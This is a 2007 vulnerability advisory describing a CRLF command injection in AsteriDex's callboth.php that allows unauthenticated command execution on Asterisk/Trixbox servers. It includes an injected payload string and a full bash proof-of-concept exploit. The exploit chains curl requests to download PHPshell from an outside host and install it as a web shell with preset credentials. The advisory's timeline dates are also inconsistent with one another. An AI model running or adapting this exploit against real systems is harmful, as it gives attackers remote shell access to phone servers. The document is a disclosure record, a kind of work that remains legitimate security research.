asteridex-exec.txt

`_______________________________________________________________________________  
  
Hoku Security   
  
Vulnerability Advisory  
_______________________________________________________________________________  
  
  
Title: AsteriDex remote command execution  
Vendor URL: http://bestof.nerdvittles.com/applications/asteridex/  
Type: Command injection / remote code execution  
Vulnerable   
versions: <= 3.0  
Risk factor: High  
Popularity: Low  
Author: Carl Livitt  
Contact: [email protected]  
Date: 25th June, 2007  
Location: http://www.hoku.co.uk/advisories/asteridex.txt  
  
  
_______________________________________________________________________________  
  
Description:  
  
  
AsteriDex is a digital rolodex for Asterisk / Trixbox PBXs. There is a  
command injection vulnerability which allows unauthenticated users to   
execute arbitrary commands on the Asterisk management console. Such  
access permits execution of arbitrary operating system commands as the  
'asterisk' user.  
  
The software is vulnerable in its default configuration.  
  
  
_______________________________________________________________________________  
  
Details:  
  
  
The script 'callboth.php' is used by AsteriDex to bridge a VOIP call  
between two end-points. Insufficient parameter checking is done on the  
variables IN and OUT, allowing a malicious user to inject arbitrary  
commands into the Asterisk management console.   
  
The script works by logging into the console server on port 5038/TCP   
on localhost. It then issues an 'Action: Originate' command which is   
used to setup the bridged call. The relevant code from callboth.php is:  
  
fputs ($fp, "Action: login\r\n");  
fputs ($fp, "Username: phpagi\r\n");  
fputs ($fp, "Secret: phpagi\r\n");  
fputs ($fp, "Events: off\r\n\r\n");  
sleep(1) ;  
fputs ($fp, "Action: Originate\r\n");  
fputs ($fp, "Channel: $IN\r\n"); << Command injection  
fputs ($fp, "Context: custom-callboth\r\n");  
fputs ($fp, "Exten: $OUT\r\n"); << Command injection  
fputs ($fp, "Priority: 1\r\n\r\n");  
  
$IN is set from $_GET['IN'] with no sanity checking other than a test of  
string length; all strings passed to $IN must be less than 100 chars,  
including the string 'sip/' which is prepended to $IN prior to the length  
check.  
  
Given sane values of $IN=123, $out=321 and $CallerID=567, the session would  
look like this:  
  
Action: login  
Username: phpagi  
Secret: phpagi  
Events: off  
  
Action: Originate  
Channel: 123  
Context: custom-callboth  
Exten: 321  
Priority: 1  
  
By including CRLF characters in $IN, an attacker can inject arbitrary   
commands into the data stream, hijacking the authenticated session to run  
commands of the attackers choice. Take, for example, a $IN string containing:  
  
[email protected]\r\nApplication: System\r\nData: echo pwn3d > /tmp/hoku.txt\r\n  
  
This would transform the session into:  
  
Action: login  
Username: phpagi  
Secret: phpagi  
Events: off  
  
Action: Originate  
Channel: [email protected]  
Application: System  
Data: echo pwn3d > /tmp/hoku.txt  
  
Context: custom-callboth  
Exten: 321  
Priority: 1  
  
This would use the call manager's 'System' functionality to execute user-  
supplied operating system commands, in this case writing the word "pwn3d" to a  
file called "/tmp/hoku.txt". The rest of the session would fail because the   
attacker has subverted the original 'Action', rendering the remaining commands   
meaningless to the manager.  
  
  
______________________________________________________________________________  
  
Updated Versions:  
  
  
A patched version of AsteriDex is available from:  
  
http://bestof.nerdvittles.com/applications/asteridex/  
  
  
_______________________________________________________________________________  
  
Timeline:  
  
  
mm/dd/yyyy  
----------  
06/25/2007 Vendor contacted.  
06/03/2007 Vendor contacted again, response received.  
Details sent to vendor.  
06/03/2007 Patch issued and updated version available.  
06/05/2007 Advisory released.  
  
  
_______________________________________________________________________________  
  
Hoku Security:  
  
Our aim is to give you the business assurance that you require in order to   
maintain a secure company infrastructure. With clients across the globe in the   
UK and USA, we understand the threats posed to your business and provide best of   
breed consulting and solutions to secure your interests and protect your bottom   
line.  
  
Visit http://www.hoku.co.uk for more information and contact details.  
  
_______________________________________________________________________________  
  
Exploit:  
  
  
A proof of concept is provided. It downloads PHPshell, installs it into the root   
of the vulnerable Asterisk server's web directory and sets a username/password of  
trixbox/trixbox. It obeys the 100 char max restriction.  
  
##   
## Begin exploit  
##  
#!/bin/bash  
  
echo Asteridex PoC Exploit (callboth.php vulnerability)  
echo By Carl Livitt / Hoku Security / June 2007  
echo   
  
# This has to be (a) a valid SIP address, and (b) must answer when dialled.  
# The exploit will fail without these conditions being met.  
# Currently uses the Melonite SIP echo test service.  
SIP="[email protected]"  
  
# Magic number, don't change. The default installation of AsteriDex checks  
# for this number and fails without it.  
SEQ=654321  
  
# Other stuff we need  
LOC=/asteridex/callboth.php  
OUT=123456  
  
# Sanity  
if [ "$1X" == "X" ]; then  
echo Syntax: $0 \<Host IP\[:port\]\>  
echo For example: $0 www.example.com:8080  
exit 1  
fi  
  
# Insanity  
echo "[-] Exploiting host $1 - please wait"  
echo -n '[+]' Building shell script  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20\!/bin/sh>/tmp/t%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20wget%20%2dO%20x.tar.bz2%20%5c%27http://%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20prdownloads.sf.net/phpshell/%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20phpshell%2d2.1.tar.bz2%3fdownload%5c%27%3e%3e/tmp/t%0d%0a" &>/dev/null  
echo '[+] Executing shell script'  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp;chmod%20%2bx%20t;./t;tar%20jxf%20x.tar.bz2%0d%0a" &>/dev/null  
echo -n '[+] Setting up phpshell'  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20cd%20/tmp;mv%20phpshell-2.1%20p%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%5c%5busers%5c%5d>config.php%0d%0a" &>/dev/null  
echo -n .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20/tmp/p;echo%20%27trixbox%3d%22trixbox%22%27>>config.php%0d%0a" &>/dev/null  
echo .  
curl "http://$1/$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20mv%20/tmp/p%20/var/www/html/phpshell%0d%0a" &>/dev/null  
  
# Have a nice day  
echo "Done! You should now be able to browse to http://$1/phpshell/phpshell.php"  
echo You can login with the username \'trixbox\' and password \'trixbox\'  
  
##  
## End Exploit  
##  
  
  
  
  
`